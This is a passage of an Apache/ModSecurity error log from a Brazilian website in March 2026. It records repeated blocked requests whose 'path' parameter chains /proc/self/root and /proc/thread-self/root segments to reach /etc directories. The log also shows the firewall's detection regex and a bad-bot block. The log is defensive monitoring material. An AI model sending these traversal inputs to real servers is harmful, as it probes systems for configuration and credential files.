"abucDeoXxyEfFpUF8f_XGAAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:44.216593 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.241.31:36090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucEP-YZRR_7pZ7nDJTXgAAA8E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:47:51.204178 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:36098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucF8df6f5d65gmYZQ44QAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:48:18.967010 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.241.31:55438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucMhkFeYa1D6dYQnCytwAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:48:47.528615 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:36174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucT-yqAr6etmhZHNoqTQAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:05.783141 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:49246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucYcdf6f5d65gmYZQ5FwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:49:10.449572 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.241.31:60694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucZv-YZRR_7pZ7nDJTowAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:13.090066 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.241.31:46878] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucada6ubjKNq_cu4YEqgAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:14.371424 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.241.31:46880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucav-YZRR_7pZ7nDJTqAAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:14.638907 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.228.61:41430] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abucata6ubjKNq_cu4YErAAAA0I"]
[Thu Mar 19 03:49:18.924741 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:46888] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucbsdf6f5d65gmYZQ5HAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:20.147520 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.241.31:41104] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuccAbLMZ6AikZjR9UjRgAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:23.714046 2026] [:error] [pid 19093:tid 140411565680384] [client 74.7.241.31:41120] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucc1_V7PWP6ixUYl6B1QAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:29.160681 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:57102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuceOoXxyEfFpUF8f_XbAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:49:29.710026 2026] [mime_magic:error] [pid 19093:tid 140411548894976] (70014)End of file found: [client 57.141.18.51:56870] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:49:36.352142 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.241.31:41134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucgBkFeYa1D6dYQnCy5gAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:49:37.577051 2026] [mime_magic:error] [pid 17653:tid 140411666392832] (70014)End of file found: [client 74.7.241.31:47834] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var
[Thu Mar 19 03:49:55.663013 2026] [:error] [pid 19093:tid 140411590858496] [client 74.7.241.31:47848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuck1_V7PWP6ixUYl6B8AAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:50:01.823540 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.241.31:60220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuclta6ubjKNq_cu4YEyQAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:50:10.424107 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:40656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucouoXxyEfFpUF8f_XhAAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:50:11.735180 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.241.31:45236] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuco_-YZRR_7pZ7nDJTswAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:50:18.571475 2026] [:error] [pid 27293:tid 140411599251200] [client 74.7.241.31:45252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abucqv-YZRR_7pZ7nDJTwAAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:50:51.681767 2026] [mime_magic:error] [pid 30077:tid 140411649607424] (70014)End of file found: [client 57.141.18.85:58774] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 03:51:31.853580 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:54732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuc89a6ubjKNq_cu4YFIAAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:51:33.251308 2026] [:error] [pid 27293:tid 140411557287680] [client 74.7.241.31:35192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuc9f-YZRR_7pZ7nDJT8AAAA9Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
